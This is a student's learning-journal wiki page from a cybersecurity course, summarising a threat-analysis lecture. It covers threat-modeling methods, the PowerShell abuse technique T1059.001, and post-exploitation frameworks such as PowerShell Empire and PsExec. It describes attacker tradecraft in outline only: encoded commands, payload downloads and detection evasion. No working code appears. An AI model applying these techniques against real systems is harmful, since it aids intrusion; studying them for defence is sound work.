10 Class 26: Learning Journal - VascoLucas01/cybersecurity-reading-notes GitHub Wiki

Introduction

[Date: 2023/06/16]

In this Class 26: Learning Journal, I am going to talk about the main ideas/concepts covered in the threat analysis lecture.

Today I Learned

Threat Analysis

Careers in Threat Analysis

Cyber threat analysts leverage skills and expertise of network engineering to mitigate and avoid cyberattacks on the organization or its employees.

  • Identify vulnerabilities
  • Study digital forensics
  • Conduct threat modeling
  • Simulate attacks, recommend defenses
  • Monitor networks

Avg. US salary

  • Entry level $84,000
  • Experienced $98,885-126,976

Cyber threat analysis is a process used by cybersecurity threat analysts to study and align a particular organization's defenses against its potential or realized cyber threats.

Threat analysis aims to answer:

  • What are we working on?
  • What are the things that can go wrong?
  • How do we go about problems that occur?
  • Did we do a good job?

Threat Modeling

Cyber threat modeling is a structured process used to determine potential security threats and weaknesses, assess risk levels per threat and implement mitigations against specific threats.

  • Optimally conducted during development of the app or system

Threat Modeling Methodologies

  • STRIDE
  • DREAD
  • PASTA
  • Trike
  • VAST
  • Attack Tree
  • CVSS
  • T-MAP
  • OCTAVE
  • Quantitative Threat Modeling Method

APT's

Stages of Exploitation

imagem

Post-exploitation:

  • Privilege Escalation
  • Lateral movement

Remote Code Execution

T1059.001

Adversaries may abuse PowerShell commands and scripts for execution

  • Executing commands
  • Leveraging enconded commands
  • Obfuscation (with or without encoding)
  • Downloading additional payloads
  • Launching additional processes
  • Examples: Start-Process cmdlet; Invoke-Command cmdlet
  • Required: Administrator permissions to connect

MS15-011: Vulnerability in Group Policy could allow remote code execution (February 10, 2015)

"PowerShell represents one of the most interesting and powerful languages for a pentesting purpose."

"... for us, as pentesters, PowerShell represent a powerful shell and scripting language which is present on our pentest targets and provide to us specially a powerful post-exploitation "tool/language" that can give us so much power and a very big attack surface/possibility." - Infosec Institute

Remote code execution (RCE) is a class of a security vulnerabilities that allows a malicious actor to execute any code of their choice on a remote machine over LAN, WAN, or internet

Post-exploitation includes the phases of operation once a victim's system has been compromised by the attacker.

Examples of post-exploitation framworks: PowerShell Empire; Metasploit

PowerShell Empire

PowerShell Empire is a pure PowerShell post-exploitation agent built on cryptoligically-secure communications and a flexible architecture.

Empire implements the ability to run PowerShell agents without needing powershell.exe

Includes rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz

Supports adaptable communications to evade network detection.

Presented in an accessible framework.

Invoke-PsExec

Invoke-PsExec is acmdlet that lets you execute PowerShell and batch/cmd.exe code asynchronously on target Windows computers, using PsExec.exe

PsExec can be downloaded from the SysInternals suite on Microsoft's site.

Remember, a batch file ends in .bat and contains non-PowerShell Windows commands only in the form of a script.